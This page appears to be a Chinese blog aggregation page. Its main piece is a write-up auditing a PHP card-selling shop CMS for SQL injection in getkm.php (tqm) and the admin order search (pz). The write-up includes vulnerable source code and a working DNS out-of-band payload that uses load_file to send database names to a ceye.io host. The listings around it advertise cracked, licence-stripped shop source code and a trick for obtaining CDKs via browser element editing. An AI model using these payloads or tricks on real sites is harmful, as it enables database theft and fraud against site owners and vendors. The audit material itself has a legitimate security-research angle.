精华内容
下载资源
问答
  • 个人发卡网源码 3.0 更新日志 1.修复改价格bug 更新日志 1.增加商品介绍功能 2.增加订单监控自动发送订单信息到用户邮箱 更新日志 1.增加支付接口 2.修复授权 3.邮箱发送改为本地 1.商品分类,添加分类,添加...
  • 无忧发卡系统_发卡网_阿洋发卡网 2019年最新发卡网layui框架带安装教程视频 【1】美化后台界面! 【2】增加hack易支付接口,abc易支付接口,码支付接口! 【3】pc/wap完美自适应无bug 【4】安装界面layui框架美化完成 ...

    无忧发卡系统_发卡网_阿洋发卡网

    2019年最新发卡网layui框架带安装教程视频
    【1】美化后台界面!
    【2】增加hack易支付接口,abc易支付接口,码支付接口!
    【3】pc/wap完美自适应无bug
    【4】安装界面layui框架美化完成
    【5】支持QQ/支付宝/wx/三种支付接口方式
    【6】前台模板后续会增加 敬请期待!
    点击链接访问查看:http://www.fzxll.com/3316.html在这里插入图片描述在这里插入图片描述

    展开全文
  • BL个人发卡网

    2018-08-12 17:23:06
    BL个人发卡网 破解版发卡网不需要授权有问题联系
  • 发卡网源码

    2019-04-26 20:02:11
    此版本是个人发卡网V5免授权版本【加密的】 更新日志版本> 1.新增批量购买/数量选择 2.更新支付接口,增加自定义易支付接口 3.优化后台界面,扁平化风格 4.新增用户卡密导出/后台卡密分类导出 5.卡密分类删除清空 6....
  • 企业级发卡网

    2019-01-20 21:02:09
    3000元购买的企业级发卡网,送给大家,但是没有搭建教程
  • 2020最新发卡网源码

    2020-02-21 17:33:51
    自动发卡网的源码,2020最新源码
  • 个人发卡网5.6

    2018-07-15 15:01:50
    个人发卡网5.6 完美破解 无后门 不会搭建的就不要下载了...
  • 这套是确定可用的一套发卡网,如果要用到正式运用的话,一定要审计过代码,确定没有 shell 点再运营用。 有需要的自己拿去吧。
  • 前言好胸弟柠枫昨天dd了我一下,这不... 首页功能点审计打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交...

    前言

    好胸弟柠枫昨天dd了我一下,这不,叫我一起审计发卡的cms

    ae077a91f553afe2b3ed120e1acb75c7.png

    君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐

    咱语文也不是很好,各位看官就将就着看看就好,水文勿喷

    7e41bd3cace3030efa72b0ce99d3c743.png

    0x01.  首页功能点审计

    c07cc80a94162865ac339e6d28afdd53.png

    打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交流)

    5d610cb7b89e43b64b26cb06aaccb4f9.png

    直接进来看一下发现这边没啥可以利用的,莫得慌,我们按照功能点来测,先买一下东西,抓个包,看下是神马

    b7468292813c10788ea991c10561f7e8.png

    这边请求到了ajax.php这个页面,好家伙,我们就直接去ajax.php审计一波

    8fcf0342303d35596f0b1b47b7281557.png

    咦??这这这,这直接拼接的吗,把我给整神了,一看到在where后面,完了

    写死了,这没啥子用呀,拼接了也执行不了啥直接把条件写死了,我们继续往下看看

    5ee97299fbeb404a01618b3a2418727a.png

    本以为这边有爱情,我觉得我又行了,进去_if函数一看哟西,头大了,我丝毫不慌,咱们随缘挖洞,就不信全部都过滤了(好吧,关键地方就是过滤了)

    可能我追求速度,没那么认真,然后粗略一看,我们继续看其他地方有没有

    ead5d8212a74f77430a62d57c0c15777.png

    6b84dbb1e18b2bdee153a8139d655137.png

    最后发现 C:\Users\86183\Desktop\faka\template\chiji\getkm.php 存在注入

    也就是 getkm.php 存在注入,我们直接去看看这个页面,我们可以看到它这边是必会执行这下面这条语句,我们就直接在post包中添加 tqm 这个参数就行

    template里面是个模板,然后 模板里面都存在 getkm.php,也就是说都存在这个注入

    44a047e6146e1d9c9a57fef2d6d5f4ab.png

    f45b3f65c4876f87ddeff525fd52e9e5.png

    于是扔给了sqlmap跑,但是我发现这边不准确,不知道为什么,我本地搭建的也会延迟,等了好久,没有反应;

    cfd785537ced84a6f205f04bb7a2b249.png

    ad7994c28b3248de3348a0ea9a189da5.png

    那就想想其他骚姿势,没有 mysql_error() 函数,报错注入就算了;

    脑瓜子一转,我觉得可以使用 dns带外进行注入,说淦就淦

    305818217d09acce4d701ea4f854d4ba.png

    先去构造一下payload

    tqm=1' and (select load_file(concat('\\\\',(select database()),'.pdkzwo.ceye.io\\aaa')))#

    ad3cb4272951261dba584cd7a0eb13a5.png

    这就成功的执行了~~

    转眼看看sqlmap

    576c0cc2cc3708f44d8a9af08418ad17.png

    还是就这样吧......

    0x02.  后台功能点

    df19502bd25196aba89ad56f2aabe7a3.png

    然后我们就在这个订单这边审计,看看能审计出什么

    <?php $pagesize=30;$pages=intval($numrows/$pagesize);if ($numrows%$pagesize){ $pages++; }if (isset($_GET['page'])){$page=intval($_GET['page']);}else{$page=1;}$offset=$pagesize*($page - 1);if(!empty($_GET['act']) && $_GET['act'] != null && $_GET['act'] == "sousuo"){    $pz = $_POST['pz'];    $sql = "SELECT * FROM if_order WHERE  out_trade_no like '%$pz%' or trade_no like '%$pz%' or rel  like '%$pz%'   order by id desc ";}else{    $sql = "SELECT * FROM if_order WHERE{$sql} order by id desc limit $offset,$pagesize";    // echo $sql;}$rs=$DB->query($sql);while($res = $DB->fetch($rs)){echo ''.$res['out_trade_no'].'
    '
    .$res['trade_no'].'' . ''.getName($res['gid'],$DB).''.$res['rel'].'' . ''.$res['endTime'].''.$res['number'].'¥'.$res['money'].'('.getPayType($res['type']).')'.''.zt($res['sta']).'';}?>

    这边出现intval函数,我们就放弃,然后我们继续往下看,看到了这一段

    5342c8fb633b662baf95212a18b3bba3.png

    这.....完全的典型的注入,这边我们可以看到act传参sousuo,POST包传参pz就行了,注入点是在pz的地方

    c6d94eca461106272580c8c2b0bd6695.png

    像我这种脚本小子,都是扔sqlmap一把梭

    6d00df2f716ebaf4a399ee4131d54463.png

    然后就这样了,这个注入还是比较多的,我没去审计完;

    4a60edd50dae854b1cd328195eb32246.png

    本人代码审计一般都是功能点审计,这也是我最常用,实战中也是比较常用的。功能点审计完后可以看看还有没有其他的漏洞,比如添加管理员的时候没有校验cookie等等的逻辑漏洞,然后再敏感函数查找,比如simplexml_load_string,unserilize,命令执行的函数等等

    另外:需要源码练手的好胸嘚公众号私聊

    展开全文
  • 这个发卡网集成了支付宝、财付通、微信、Q钱包的官方接口,也集成了第三方“易宝”和“云支付”接口
  • 2021年最新发卡网.zip

    2021-02-14 00:01:19
    2021年最新,个人发卡网可运营
  • 个人发卡网源码 超简洁前台样式 自动发卡平台 免授权,无后门,完美运营
  • 【PHP 自动发卡网源码】多功能自动发卡平台+带手机版+带多套商户模板
  • HP二次元风格发卡系统源码荔枝发卡网2.0 集成当面付+扩展信息功能 功能:自动发货和手动发货,邮箱通知,修改背景图片,对接支付宝当面付,商品扩展信息,优惠券,批发优惠 环境需求:PHP7.2+ / MySQL5.6+ Nginx伪...

    介绍:

    HP二次元风格发卡系统源码荔枝发卡网2.0 集成当面付+扩展信息功能
    功能:自动发货和手动发货,邮箱通知,修改背景图片,对接支付宝当面付,商品扩展信息,优惠券,批发优惠
    环境需求:PHP7.2+ / MySQL5.6+
    Nginx伪静态:
      location / {
              if (!-e $request_filename){

    }
        }


    网盘下载地址:

    http://kekewl.cc/FFOxV7D4wiO


    图片:


    展开全文
  • 简介: 2020最新版个人发卡网,增加了王者荣耀模板,还附带了安装教程 全部功能可用,修复了支付和订单查询功能。
  • 本人2013年开始接触互联网上一些相对偏僻行业,例如发卡网,卡盟,代刷网,社区,租号网等等!废话不多说,下面我给大家说一下自动发卡平台到底是怎样鉴别好坏的呢?1:首先查看平台资质,通过平台展示的营业执照上...

    375788c50eba906fdd1093d1af860fb3.png

    你们好,我是江鸿途.


    本人2013年开始接触互联网上一些相对偏僻行业,例如发卡网,卡盟,代刷网,社区,租号网等等!废话不多说,下面我给大家说一下自动发卡平台到底是怎样鉴别好坏的呢?

    1:首先查看平台资质,通过平台展示的营业执照上公司名称到*企查或是其他查询公司资料的平台进行查看公司资质!

    f9523b1405b5440ba3a045ff0f6b4b45.png
    图1

    从<图1>我们可以看见这家公司登记的住所或是经营场所无法联系,其实这就是最常见的公司造假,自动发卡平台通过代办公司等平台帮助自己办理一家公司并拿到营业执照等等,而这种方式办理公司没有门槛,只要钱给够基本都能办下来!2:查看公司在*度,知乎,*博,*吧,黑*投诉等平台是否存在用户投诉的情况!

    b3fed2f2fab772071dffd89846e550fc.png
    图2

    845465971ec6732add9d8aff46b63c99.png
    图3

    以上两张截图是我从知乎中截取的,从<图2><图3>不难看出很多商户对于这家平台的评价可以说是糟糕透顶,当我们发现这类情况的时候,基本这家平台就不用再看了,坚决不要使用。3:查看站点信息补充是否全面,主要查看站点中填写的联系方式,公告中是否公示交易费率,提现费率,提现门槛,以及结算时间。

    1de3e5a8993126060438e8c445985555.png
    图4

    6340a30ef1fcf6d4dd03d7defc75114f.png
    图5

    从<图4>可以明确的看见平台联系QQ,联系电话,联系地址,这张图所展示的就属于相对完善的,从<图5>可以看见提现门槛,提现费率,到账时间,以及自动提现门槛,提现费率,这家平台的交易费率需要进入商户后台才可看见我就不做过多展示。4:最后一点就看凭借我们自己的眼睛了,观察站点风格,一家大的公司是绝对不会去使用互联网上到处流通的源码的,并且他们采用的模板风格一般都是定制的,并且在站点底部都会有版权声明。如果平台风格与大多数自动发卡平台过于相似,大部分都是个人创办的站点。

    5e2053824c5ef7b54db47e60fbe58242.png
    图6

    <图6>这家平台的风格其实是现在发卡网使用较多的程序,其他的我就不一一列举了,各位小伙伴多多观察哦。以上就是辨别一家站点好坏的方法了,如果有更好的建议,评论区告诉我哦!

    展开全文
  • 高级版伯乐发卡网网赚源码 去除授权
  • 个人发卡网搭建源码 三套 在本地测试可用 都是自己在外面找来的 需要的可以下载试下 也可做参考自己编写
  • 个人发卡网修复版.zip

    2020-04-25 14:04:40
    个人发卡网源码 修复介绍:1.修复改价格bug2.增加商品介绍功能3.增加订单监控自动发送订单信息到用户邮箱4.增加支付接口5.修复授权6.邮箱发送改为本地订单发送邮件监控域名/ayangw/mon.php
  • 2020新版企业发卡网程序 全新界面知宇系统+4套模板切换 全新手机wap端可对接小程序,无BUG安装简单
  • 价值50元的伯乐发卡网高级版 价值50元的伯乐发卡网高级版 价值50元的伯乐发卡网高级版 QQ交流群:709561846
  • 发卡网(全解无后门) 源码直接用,已经修改。个人自动发卡系统源码供应平台,程序集成免签约即时到账支付接口,资金不中转直接入收款账户更加安全。持续更新不断完善用户体验...
  • 个人发卡网源码搭建教程

    千次阅读 2020-01-08 15:46:52
    相对于企业发卡网,个人发卡网就会自由许多,但是这需要你懂得网站搭建运营的基本知识,一般人对这一窍不通,本篇为了指导新人们搭建基本的发卡网而写。 步骤: 1、首先你需要有服务器和域名。不要用虚拟主机,网络...
  • 个人发卡网V5免授权

    2018-06-29 06:36:13
    此版本是个人发卡网V5免授权版本【加密的】 更新日志版本> 1.新增批量购买/数量选择 2.更新支付接口,增加自定义易支付接口 3.优化后台界面,扁平化风格 4.新增用户卡密导出/后台卡密分类导出 5.卡密分类...
  • 审查元素是Google Chrome浏览器提供的一项服务功能,用户只需右键点击“审查元素”(名字),即可打开Chrome Inspector,... 本次教程为教大家利用审查元素无限撸发卡网CDK(非所有发卡网通用) 本教程权供与学习于参考
  • 简介: 个人发卡网源码 超简洁前台样式 自动发卡平台 免授权,无后门,完美运营 网盘下载地址: http://www.bytepan.com/Tdo7PeWRSSa
  • 王者荣耀模板发卡网整站源码对接微信支付宝双通道个人免签接口+个人发卡在线下单自动发货开源源码 比较完美的一款发卡网站源码,发卡网的源码有很多,但大多是要么残缺要么授权要么支付不完美,这款是一款王者荣耀...
  • EDLM个人发卡网(程序)是由MadDog使用Thinkphp5开发的一个站长收款免签约自助提卡系统,安全、稳定、不加收任何费用、直接到账、一站式售卡系统。 EDLM个人发卡网的使用 搭建方法: 0.确保程序可获得文件最高操作...

空空如也

空空如也

1 2 3 4 5 ... 17
收藏数 325
精华内容 130
关键字:

发卡网